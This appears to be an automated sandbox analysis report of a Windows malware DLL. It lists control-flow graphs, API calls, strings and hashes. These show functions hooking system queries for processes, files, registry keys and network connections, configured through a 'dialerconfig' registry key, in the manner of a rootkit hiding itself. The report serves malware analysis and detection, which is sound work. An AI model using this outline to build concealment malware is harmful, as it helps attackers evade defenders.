                                                                control_flow_graph 51 1aff2cdc-1aff2d55 NtDeviceIoControlFile 52 1aff2d5b-1aff2d61 51->52 53 1aff3090-1aff30b3 51->53 52->53 54 1aff2d67-1aff2d6a 52->54 54->53 55 1aff2d70-1aff2d73 54->55 55->53 56 1aff2d79-1aff2d89 GetModuleHandleA 55->56 57 1aff2d9d 56->57 58 1aff2d8b-1aff2d9b GetProcAddress 56->58 59 1aff2da0-1aff2dbe 57->59 58->59 59->53 61 1aff2dc4-1aff2de3 StrCmpNIW 59->61 61->53 62 1aff2de9-1aff2ded 61->62 62->53 63 1aff2df3-1aff2dfd 62->63 63->53 64 1aff2e03-1aff2e0a 63->64 64->53 65 1aff2e10-1aff2e23 64->65 66 1aff2e25-1aff2e31 65->66 67 1aff2e33 65->67 68 1aff2e36-1aff2e3a 66->68 67->68 69 1aff2e3c-1aff2e48 68->69 70 1aff2e4a 68->70 71 1aff2e4d-1aff2e57 69->71 70->71 72 1aff2f4d-1aff2f51 71->72 73 1aff2e5d-1aff2e60 71->73 74 1aff2f57-1aff2f5a 72->74 75 1aff3082-1aff308a 72->75 76 1aff2e72-1aff2e7c 73->76 77 1aff2e62-1aff2e6f call 1aff1a14 73->77 78 1aff2f5c-1aff2f68 call 1aff1a14 74->78 79 1aff2f6b-1aff2f75 74->79 75->53 75->65 81 1aff2e7e-1aff2e8b 76->81 82 1aff2eb0-1aff2eba 76->82 77->76 78->79 84 1aff2f77-1aff2f84 79->84 85 1aff2fa5-1aff2fa8 79->85 81->82 87 1aff2e8d-1aff2e9a 81->87 88 1aff2ebc-1aff2ec9 82->88 89 1aff2eea-1aff2eed 82->89 84->85 94 1aff2f86-1aff2f93 84->94 95 1aff2faa-1aff2fb3 call 1aff1d28 85->95 96 1aff2fb5-1aff2fc2 lstrlenW 85->96 97 1aff2e9d-1aff2ea3 87->97 88->89 90 1aff2ecb-1aff2ed8 88->90 92 1aff2eef-1aff2ef9 call 1aff1d28 89->92 93 1aff2efb-1aff2f08 lstrlenW 89->93 98 1aff2edb-1aff2ee1 90->98 92->93 105 1aff2f43-1aff2f48 92->105 100 1aff2f2b-1aff2f3d call 1aff3930 93->100 101 1aff2f0a-1aff2f14 93->101 102 1aff2f96-1aff2f9c 94->102 95->96 115 1aff2ffa-1aff3005 95->115 106 1aff2fe5-1aff2fef call 1aff3930 96->106 107 1aff2fc4-1aff2fce 96->107 104 1aff2ea9-1aff2eae 97->104 97->105 98->105 110 1aff2ee3-1aff2ee8 98->110 100->105 108 1aff2ff2-1aff2ff4 100->108 101->100 113 1aff2f16-1aff2f29 call 1aff1554 101->113 114 1aff2f9e-1aff2fa3 102->114 102->115 104->82 104->97 105->108 106->108 107->106 109 1aff2fd0-1aff2fe3 call 1aff1554 107->109 108->75 108->115 109->106 109->115 110->89 110->98 113->100 113->105 114->85 114->102 120 1aff307c-1aff3080 115->120 121 1aff3007-1aff300b 115->121 120->75 125 1aff300d-1aff3011 121->125 126 1aff3013-1aff302d call 1aff86a0 121->126 125->126 128 1aff3030-1aff3033 125->128 126->128 131 1aff3056-1aff3059 128->131 132 1aff3035-1aff3053 call 1aff86a0 128->132 131->120 133 1aff305b-1aff3079 call 1aff86a0 131->133 132->131 133->120
                                                                APIs
                                                                • NtDeviceIoControlFile.NTDLL ref: 1AFF2D47
                                                                • GetModuleHandleA.KERNEL32 ref: 1AFF2D80
                                                                • lstrlenW.KERNEL32 ref: 1AFF2FBA
                                                                  • Part of subcall function 1AFF1A14: OpenProcess.KERNEL32 ref: 1AFF1A3A
                                                                  • Part of subcall function 1AFF1A14: K32GetModuleFileNameExW.KERNEL32 ref: 1AFF1A58
                                                                  • Part of subcall function 1AFF1A14: PathFindFileNameW.SHLWAPI ref: 1AFF1A67
                                                                  • Part of subcall function 1AFF1A14: lstrlenW.KERNEL32 ref: 1AFF1A73
                                                                  • Part of subcall function 1AFF1A14: StrCpyW.SHLWAPI ref: 1AFF1A86
                                                                  • Part of subcall function 1AFF1A14: CloseHandle.KERNEL32 ref: 1AFF1A94
                                                                • GetProcAddress.KERNEL32 ref: 1AFF2D95
                                                                  • Part of subcall function 1AFF1554: StrCmpIW.SHLWAPI ref: 1AFF1585
                                                                  • Part of subcall function 1AFF3930: StrCmpNIW.SHLWAPI ref: 1AFF3948
                                                                • StrCmpNIW.SHLWAPI ref: 1AFF2DD8
                                                                • lstrlenW.KERNEL32 ref: 1AFF2F00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Filelstrlen$HandleModuleName$AddressCloseControlDeviceFindOpenPathProcProcess
                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                • API String ID: 1201441540-3850299575
                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction ID: 4d616da9b08f6d6ecf3e93fcb18346bc56ace7190a6868f9a16412dfb249e728
                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction Fuzzy Hash: D1A1F03B321B9582DB09CF25C45079AB3A8FB88B88F515917EE4953B78EF35C980C750

                                                                Control-flow Graph

                                                                APIs
                                                                • GetProcessIdOfThread.KERNEL32 ref: 1AFF2405
                                                                • GetCurrentProcessId.KERNEL32 ref: 1AFF240F
                                                                • NtResumeThread.NTDLL ref: 1AFF24C4
                                                                  • Part of subcall function 1AFF19AC: OpenProcess.KERNEL32 ref: 1AFF19CA
                                                                  • Part of subcall function 1AFF19AC: IsWow64Process.KERNEL32 ref: 1AFF19E0
                                                                  • Part of subcall function 1AFF19AC: CloseHandle.KERNEL32 ref: 1AFF19FB
                                                                • CreateFileW.KERNEL32 ref: 1AFF2468
                                                                • WriteFile.KERNEL32 ref: 1AFF2490
                                                                • ReadFile.KERNEL32 ref: 1AFF24AF
                                                                • CloseHandle.KERNEL32 ref: 1AFF24B8
                                                                Strings
                                                                • \\.\pipe\dialerchildproc64, xrefs: 1AFF2438
                                                                • \\.\pipe\dialerchildproc32, xrefs: 1AFF243F
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Process$File$CloseHandleThread$CreateCurrentOpenReadResumeWow64Write
                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                • API String ID: 2222519123-1373409510
                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction ID: 3ef86b18590cfcde4ed01c34035d5a9f4ac43790d01f7bed47f902e9da8f3290
                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction Fuzzy Hash: 1A213836618B4483EB11DB25F5583AB77A0F78DBE4F904215EA9902BA8DF7CC189CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 150 1aff26f0-1aff2774 NtQueryDirectoryFileEx 151 1aff298f-1aff29b2 150->151 152 1aff277a-1aff277d 150->152 152->151 153 1aff2783-1aff2791 152->153 153->151 154 1aff2797-1aff27dd call 1aff8d50 * 3 GetFileType 153->154 161 1aff27df-1aff27f3 StrCpyW 154->161 162 1aff27f5-1aff27ff call 1aff1ab8 154->162 163 1aff2804-1aff2808 161->163 162->163 165 1aff280e-1aff2827 call 1aff3264 call 1aff3930 163->165 166 1aff28b3-1aff28b9 163->166 179 1aff285e-1aff28a8 165->179 180 1aff2829-1aff2858 call 1aff3264 call 1aff3200 call 1aff1e4c 165->180 168 1aff28bc-1aff28c1 166->168 170 1aff28df 168->170 171 1aff28c3-1aff28c6 168->171 172 1aff28e1-1aff28fa call 1aff3264 call 1aff3930 170->172 171->170 174 1aff28c8-1aff28cb 171->174 189 1aff28fc-1aff292b call 1aff3264 call 1aff3200 call 1aff1e4c 172->189 190 1aff293b-1aff293d 172->190 174->170 177 1aff28cd-1aff28d0 174->177 177->170 181 1aff28d2-1aff28d5 177->181 179->151 191 1aff28ae 179->191 180->151 180->179 181->170 183 1aff28d7-1aff28dd 181->183 183->170 183->172 189->190 213 1aff292d-1aff2937 189->213 192 1aff293f-1aff295c call 1aff86a0 190->192 193 1aff2961-1aff2964 190->193 191->165 192->168 198 1aff296e-1aff2971 193->198 199 1aff2966-1aff296c 193->199 203 1aff298c 198->203 204 1aff2973-1aff2976 198->204 199->151 203->151 204->203 206 1aff2978-1aff297b 204->206 206->203 208 1aff297d-1aff2980 206->208 208->203 210 1aff2982-1aff2985 208->210 210->203 212 1aff2987-1aff298a 210->212 212->151 212->203 213->151 214 1aff2939 213->214 214->168
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: File$DirectoryQueryType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 4175507832-91387939
                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction ID: 67bb0b9a6d86aff1f6a2dbac780cf3b43bf80c6aff467987ed6a2b1ebae090ec
                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                • Instruction Fuzzy Hash: 6861CB3B614BC686CB24DF2699903EAB795F789BC4F814827DE8A47B28DF35C604C740

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 215 1aff21cc-1aff2206 NtQuerySystemInformation 216 1aff220f-1aff2212 215->216 217 1aff2208-1aff220c 215->217 218 1aff23cd-1aff23ed 216->218 219 1aff2218-1aff221b 216->219 217->216 220 1aff231d-1aff2320 219->220 221 1aff2221-1aff2233 219->221 222 1aff2322-1aff233c call 1aff30b4 220->222 223 1aff2391-1aff2394 220->223 221->218 224 1aff2239-1aff224f 221->224 222->218 235 1aff2342-1aff2358 222->235 223->218 228 1aff2396-1aff23a9 call 1aff30b4 223->228 226 1aff227d-1aff2288 call 1aff1d28 224->226 227 1aff2251-1aff2261 224->227 236 1aff22a9-1aff22bb 226->236 238 1aff228a-1aff22a2 call 1aff1d60 226->238 227->226 231 1aff2263-1aff227b StrCmpNIW 227->231 228->218 237 1aff23ab-1aff23b3 228->237 231->226 231->236 235->218 241 1aff235a-1aff2376 235->241 239 1aff22bd-1aff22bf 236->239 240 1aff22cb-1aff22cd 236->240 237->218 242 1aff23b5-1aff23bd 237->242 238->236 253 1aff22a4-1aff22a7 238->253 244 1aff22c6-1aff22c9 239->244 245 1aff22c1-1aff22c4 239->245 246 1aff22cf-1aff22d2 240->246 247 1aff22d4 240->247 248 1aff237a-1aff238d 241->248 249 1aff23c0-1aff23cb 242->249 251 1aff22d7-1aff22da 244->251 245->251 246->251 247->251 248->248 252 1aff238f 248->252 249->218 249->249 254 1aff22dc-1aff22e2 251->254 255 1aff22e8-1aff22eb 251->255 252->218 253->251 254->224 254->255 255->218 256 1aff22f1-1aff22f5 255->256 257 1aff230c-1aff2318 256->257 258 1aff22f7-1aff22fa 256->258 257->218 258->218 259 1aff2300-1aff2305 258->259 259->256 260 1aff2307 259->260 260->218
                                                                APIs
                                                                • NtQuerySystemInformation.NTDLL ref: 1AFF21F7
                                                                • StrCmpNIW.SHLWAPI ref: 1AFF2270
                                                                  • Part of subcall function 1AFF30B4: GetProcessHeap.KERNEL32 ref: 1AFF30D7
                                                                  • Part of subcall function 1AFF30B4: RtlAllocateHeap.NTDLL ref: 1AFF30EA
                                                                  • Part of subcall function 1AFF30B4: StrCmpNIW.SHLWAPI ref: 1AFF316B
                                                                  • Part of subcall function 1AFF30B4: GetProcessHeap.KERNEL32 ref: 1AFF31D1
                                                                  • Part of subcall function 1AFF30B4: HeapFree.KERNEL32 ref: 1AFF31DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocateFreeInformationQuerySystem
                                                                • String ID: S$dialer
                                                                • API String ID: 4073547687-3873981283
                                                                • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                • Instruction ID: 22823929b6fe10d94c96c35426d98dd2c456f2cc4dd224c2a1f01bc0ae7f932e
                                                                • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                • Instruction Fuzzy Hash: A151057BB10B69C6E710CFAAD8406AD73B4FB04794B429D26EF5463B24EB35D891C720

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 261 1aff24dc-1aff255e NtQueryDirectoryFile 262 1aff26ca-1aff26ec 261->262 263 1aff2564-1aff2567 261->263 263->262 264 1aff256d-1aff257b 263->264 264->262 265 1aff2581-1aff25cc call 1aff8d50 * 3 GetFileType 264->265 272 1aff25ce-1aff25e0 StrCpyW 265->272 273 1aff25e2-1aff25ea call 1aff1ab8 265->273 274 1aff25ef-1aff25f4 272->274 273->274 276 1aff25f6-1aff25f9 274->276 277 1aff2613 274->277 276->277 278 1aff25fb-1aff25fe 276->278 279 1aff2615-1aff2633 call 1aff3264 call 1aff3930 277->279 278->277 280 1aff2600-1aff2603 278->280 288 1aff267b-1aff267d 279->288 289 1aff2635-1aff2668 call 1aff3264 call 1aff3200 call 1aff1e4c 279->289 280->277 282 1aff2605-1aff2608 280->282 282->277 284 1aff260a-1aff260d 282->284 284->277 286 1aff260f-1aff2611 284->286 286->279 290 1aff267f-1aff2698 call 1aff86a0 288->290 291 1aff269d-1aff26a0 288->291 289->288 308 1aff266a-1aff2674 289->308 290->274 294 1aff26a9-1aff26ac 291->294 295 1aff26a2-1aff26a7 291->295 298 1aff26ae-1aff26b1 294->298 299 1aff26c7 294->299 295->262 298->299 302 1aff26b3-1aff26b6 298->302 299->262 302->299 304 1aff26b8-1aff26bb 302->304 304->299 306 1aff26bd-1aff26c0 304->306 306->299 307 1aff26c2-1aff26c5 306->307 307->262 307->299 308->262 309 1aff2676 308->309 309->274
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: File$DirectoryQueryType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 4175507832-91387939
                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction ID: 34f315234c8ce74e05e423950b85a87b51cd6879dea509002862d6a134b053ce
                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                • Instruction Fuzzy Hash: 9341F63B7087C582CA21DF29A99436EB751F795B80F424926CE9A47F38DF3AD405CB50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 414 1aff29b4-1aff29fd NtEnumerateKey 415 1aff29ff-1aff2a01 414->415 416 1aff2a5c-1aff2a7a 414->416 417 1aff2a08-1aff2a0a 415->417 418 1aff2a03-1aff2a06 415->418 419 1aff2a0c-1aff2a0e 417->419 418->416 418->417 419->416 420 1aff2a10-1aff2a35 NtEnumerateKey 419->420 421 1aff2a37-1aff2a3a 420->421 422 1aff2a46 420->422 424 1aff2a3c-1aff2a3e 421->424 425 1aff2a40-1aff2a44 421->425 423 1aff2a4a-1aff2a51 call 1aff3930 422->423 428 1aff2a55-1aff2a5a 423->428 429 1aff2a53 423->429 424->423 425->423 428->416 428->419 429->428
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Enumerate
                                                                • String ID:
                                                                • API String ID: 304946047-0
                                                                • Opcode ID: 28187458d9fd4ab8547a98169ab3048fbb9103ded671a54f01af97c29d48ccde
                                                                • Instruction ID: 7caea0fd9e0090d8fa2b4c13dbf4dcddd7bb25860545e305d3d5e4b6662f347a
                                                                • Opcode Fuzzy Hash: 28187458d9fd4ab8547a98169ab3048fbb9103ded671a54f01af97c29d48ccde
                                                                • Instruction Fuzzy Hash: 6C119D3B60479686D774CF16B88060BB3A4F788F90F524827EE9983734EF38C4468744

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 430 1aff2a7c-1aff2ac5 NtEnumerateValueKey 431 1aff2ac7-1aff2aca 430->431 432 1aff2b20-1aff2b3e 430->432 431->432 433 1aff2acc-1aff2ace 431->433 434 1aff2ad0-1aff2ad2 433->434 434->432 435 1aff2ad4-1aff2af9 NtEnumerateValueKey 434->435 436 1aff2afb-1aff2afe 435->436 437 1aff2b0a 435->437 439 1aff2b04-1aff2b08 436->439 440 1aff2b00-1aff2b02 436->440 438 1aff2b0e-1aff2b15 call 1aff3930 437->438 443 1aff2b19-1aff2b1e 438->443 444 1aff2b17 438->444 439->438 440->438 443->432 443->434 444->443
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: EnumerateValue
                                                                • String ID:
                                                                • API String ID: 1749906896-0
                                                                • Opcode ID: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
                                                                • Instruction ID: 7f5302c4a4924af7a5b0be40ebc779640613b65ec62f5a087316a89b2a317c21
                                                                • Opcode Fuzzy Hash: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
                                                                • Instruction Fuzzy Hash: 80119E3B704B9582D762DF1ABC4061BB7A4F388B94F414926EF8983724EF75C486C740
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7334aa76e20f5f3d2de1d2865bf28f35a71f47aa3f31541d40965cd51f69b05c
                                                                • Instruction ID: 634cfaabbc10c54d6e449fb1cbaf48174c8f3621f95c973171f65b485bda8361
                                                                • Opcode Fuzzy Hash: 7334aa76e20f5f3d2de1d2865bf28f35a71f47aa3f31541d40965cd51f69b05c
                                                                • Instruction Fuzzy Hash: 99D13331B0E94E4FE778EA6C88665B937C4FF48711B0502B9D05EC75B3DE29AE068781
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4341668c6a81b677f26f96afa21b7d45575a6ecd0046044065491d094f1c2bf4
                                                                • Instruction ID: 386f8094c62a568b878ad66656c7116dbe2d4bd0b8b67b1faf91dfdad643f08a
                                                                • Opcode Fuzzy Hash: 4341668c6a81b677f26f96afa21b7d45575a6ecd0046044065491d094f1c2bf4
                                                                • Instruction Fuzzy Hash: 1D91C272A18A8D4FD75ADF6888657A97FE1FF99314F0002BED049C76D6CFB824008740

                                                                Control-flow Graph

                                                                APIs
                                                                • GetProcessHeap.KERNEL32 ref: 1AFF165B
                                                                • RtlAllocateHeap.NTDLL ref: 1AFF166A
                                                                  • Part of subcall function 1AFF1274: GetProcessHeap.KERNEL32 ref: 1AFF127A
                                                                  • Part of subcall function 1AFF1274: RtlAllocateHeap.NTDLL ref: 1AFF1289
                                                                  • Part of subcall function 1AFF1274: GetProcessHeap.KERNEL32 ref: 1AFF12A3
                                                                  • Part of subcall function 1AFF1274: RtlAllocateHeap.NTDLL ref: 1AFF12B4
                                                                  • Part of subcall function 1AFF1000: GetProcessHeap.KERNEL32 ref: 1AFF1006
                                                                  • Part of subcall function 1AFF1000: RtlAllocateHeap.NTDLL ref: 1AFF1015
                                                                  • Part of subcall function 1AFF1000: GetProcessHeap.KERNEL32 ref: 1AFF1028
                                                                  • Part of subcall function 1AFF1000: RtlAllocateHeap.NTDLL ref: 1AFF1037
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF16DA
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF1707
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF1721
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF1741
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF175C
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF177C
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF1797
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF17B7
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF17D2
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF17F2
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF180D
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF182D
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF1848
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF1868
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF1883
                                                                • RegOpenKeyExW.ADVAPI32 ref: 1AFF18A3
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF18BE
                                                                • RegCloseKey.ADVAPI32 ref: 1AFF18C8
                                                                  • Part of subcall function 1AFF12C8: RegQueryInfoKeyW.ADVAPI32 ref: 1AFF1326
                                                                  • Part of subcall function 1AFF12C8: GetProcessHeap.KERNEL32 ref: 1AFF1334
                                                                  • Part of subcall function 1AFF12C8: RtlAllocateHeap.NTDLL ref: 1AFF1345
                                                                  • Part of subcall function 1AFF12C8: RegEnumValueW.ADVAPI32 ref: 1AFF13A1
                                                                  • Part of subcall function 1AFF12C8: GetProcessHeap.KERNEL32 ref: 1AFF13E9
                                                                  • Part of subcall function 1AFF12C8: RtlAllocateHeap.NTDLL ref: 1AFF13F7
                                                                  • Part of subcall function 1AFF12C8: GetProcessHeap.KERNEL32 ref: 1AFF141B
                                                                  • Part of subcall function 1AFF12C8: HeapFree.KERNEL32 ref: 1AFF1429
                                                                  • Part of subcall function 1AFF12C8: lstrlenW.KERNEL32 ref: 1AFF1432
                                                                  • Part of subcall function 1AFF12C8: GetProcessHeap.KERNEL32 ref: 1AFF1440
                                                                  • Part of subcall function 1AFF12C8: RtlAllocateHeap.NTDLL ref: 1AFF144E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Heap$CloseOpenProcess$Allocate$EnumFreeInfoQueryValuelstrlen
                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                • API String ID: 2011442324-2879589442
                                                                • Opcode ID: 3f4d5a7ab15329cbb7b172142327082ccb78e577aaea383aca5eb264960cb7f6
                                                                • Instruction ID: fd2dda93142674f907eaf09fe0d745bc9c9b0951af71e1a4337d2d96959dc427
                                                                • Opcode Fuzzy Hash: 3f4d5a7ab15329cbb7b172142327082ccb78e577aaea383aca5eb264960cb7f6
                                                                • Instruction Fuzzy Hash: 5C71F33B711B5186EB12AF66E89079A37A4FB89BC8F405622EE4D57B28DF38C445C704

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 145 1aff1ab8-1aff1ae0 GetFinalPathNameByHandleW 146 1aff1ae2-1aff1afa StrCmpNIW 145->146 147 1aff1b21-1aff1b33 145->147 146->147 148 1aff1afc-1aff1b0c lstrlenW 146->148 148->147 149 1aff1b0e-1aff1b1c StrCpyW 148->149 149->147
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: FinalHandleNamePathlstrlen
                                                                • String ID: \\?\
                                                                • API String ID: 2719912262-4282027825
                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction ID: 29c552a73d88389bae0a91c415bba8e98603038c0b64facbdf7a90e2b5290b45
                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                • Instruction Fuzzy Hash: 5BF03C3230478192E7229B21E4D439B7720F74CBC8F848031DB4986964DF6CC688CB00

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
